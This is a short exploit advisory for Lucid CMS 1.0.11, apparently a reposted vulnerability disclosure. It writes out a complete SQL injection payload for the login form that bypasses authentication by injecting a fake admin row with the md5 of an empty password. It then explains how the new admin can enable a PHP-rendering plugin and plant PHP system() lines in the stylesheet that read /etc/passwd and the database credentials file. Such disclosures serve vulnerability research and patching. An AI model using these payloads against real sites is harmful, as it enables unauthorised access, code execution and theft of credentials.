Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution
software:
site: http://lucidcms.net/
description:
lucidCMS is a simple and flexible content management system for the individual or
organization that wishes to manage a collection of web pages without the overhead
and complexity of other available "community" CMS options.
1) if magic quotes off -> SQL Injection:
you can login as admin typing in login form:
login: 'UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b204e98
00998ecf8427e','1')/*
pass: [nothing] ^
|
|
this is the hash of...nothing
the result of md5('');
note:"login" without spaces
the login query become:
SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b
204e9800998ecf8427e','1')/*'
2)
now new admin can edit template and insert evil javascript code, see the phpinfo(), manage users/groups,
activate/disable plugins, you can activate renderPHP plugin, add the following line at the end of
the main stylesheet:
<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>
to see /etc/passwd file
<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>
to see database username/password, the database name and table prefix... now you have the full control
of the database
rgod
site: http://altervista.org
mail: retrogod (at) aliceposta (dot) it [email concealed]
original advisory: http://rgod.altervista.org/lucidcms1011.html
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum